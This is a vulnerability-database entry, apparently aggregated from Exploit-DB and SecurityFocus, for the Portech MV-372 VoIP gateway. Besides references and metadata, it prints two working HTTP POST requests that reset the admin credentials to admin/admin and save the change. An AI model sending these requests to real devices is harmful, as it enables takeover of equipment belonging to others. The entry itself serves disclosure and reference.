ID

VAR-E-201107-0097


EDB ID

35925


TITLE

Portech MV-372 VoIP Gateway - Multiple Vulnerabilities - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 35925

DESCRIPTION

Portech MV-372 VoIP Gateway - Multiple Vulnerabilities.. remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 35925

AFFECTED PRODUCTS

vendor:portechmodel:mv-372 voip gatewayscope: - version: -

Trust: 1.0

vendor:portechmodel:mv-372scope:eqversion:0

Trust: 0.3

sources: BID: 48560 // EXPLOIT-DB: 35925

EXPLOIT

source: https://www.securityfocus.com/bid/48560/info

The Portech MV-372 VoIP Gateway is prone to multiple security vulnerabilities.

An attacker may leverage these issues to obtain potentially sensitive information, cause vulnerable devices to crash (resulting in a denial-of-service condition), or bypass certain security restrictions by sending a specially crafted HTTP POST request.

POST http://<device address>/change.cgi HTTP/1.1
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/change.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

Nuser=admin&Npass=admin&Nrpass=admin&submit=Submit

POST http://<device address>/save.cgi
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/save.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

submit=Save

Trust: 1.0

sources: EXPLOIT-DB: 35925

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 35925

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 35925

TYPE

Multiple Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 35925

CREDITS

Zsolt Imre

Trust: 0.6

sources: EXPLOIT-DB: 35925

EXTERNAL IDS

db:BIDid:48560

Trust: 1.9

db:EXPLOIT-DBid:35925

Trust: 1.6

db:EDBNETid:57306

Trust: 0.6

sources: BID: 48560 // EXPLOIT-DB: 35925 // EDBNET: 57306

REFERENCES

url:https://www.securityfocus.com/bid/48560/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/35925/

Trust: 0.6

url:http://www.portech.com.tw/p3-product1_1.asp?pid=14

Trust: 0.3

sources: BID: 48560 // EXPLOIT-DB: 35925 // EDBNET: 57306

SOURCES

db:BIDid:48560
db:EXPLOIT-DBid:35925
db:EDBNETid:57306

LAST UPDATE DATE

2022-07-27T09:22:18.703000+00:00


SOURCES UPDATE DATE

db:BIDid:48560date:2011-07-05T00:00:00

SOURCES RELEASE DATE

db:BIDid:48560date:2011-07-05T00:00:00
db:EXPLOIT-DBid:35925date:2011-07-05T00:00:00
db:EDBNETid:57306date:2011-07-05T00:00:00